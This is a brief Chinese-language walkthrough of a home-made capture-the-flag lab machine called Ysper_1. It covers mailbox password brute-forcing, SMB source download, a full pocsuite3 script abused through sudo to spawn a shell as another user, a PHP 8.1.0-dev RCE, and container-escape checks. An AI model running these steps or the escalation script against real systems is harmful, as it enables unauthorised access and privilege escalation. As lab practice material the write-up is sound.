ysper牌靶机自制靶机 - Ysper_1
爆破邮箱密码
爆破后在里面找到第一个flag
然后利用爆出的密码1q2w3e4r
去进行smb faker访问
下载源码
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
|
源码中找到
拿到shell
数据库中有flag
数据库密码为root在源码config文件中也可找到
sudo -l发现faker权限的pocsuite
提权到faker
cat << 'EOF' > /tmp/e.py
from pocsuite3.api import Output, POCBase, register_poc
import os
class POC(POCBase):
vulID = "faker-001" # 随便写一个ID
version = "1.0"
author = "chatgpt"
vulDate = "2025-04-20"
createDate = "2025-04-20"
updateDate = "2025-04-20"
references = []
name = "faker privilege shell"
appPowerLink = "-"
appName = "faker"
appVersion = "1.0"
vulType = "privilege escalation"
desc = "spawn bash as faker user"
def _verify(self):
result = {}
os.system("/bin/bash")//做权限维持的话就在这里读私钥
return self.parse_output(Output(self))
def _attack(self):
return self._verify()
register_poc(POC)
EOF
|
sudo -u faker /usr/local/bin/pocsuite -u 127.0.0.1 -r /tmp/e.py
|
很明显8080
代理出来
打PHP 8.1.0-dev rce
然后就是简单是容器逃逸
ls -l /var/run/docker.sock
检查套接字
capsh --print | grep cap_sys_admin
是否为特权容器
mount | grep -E ' / | /host | /mnt'
是否挂载了宿主文件系统
ls -la /proc/1/root
是否能访问 /proc/1/root
uname -a
查看内核版本
|
最后可得
Privileged 特权模式逃逸
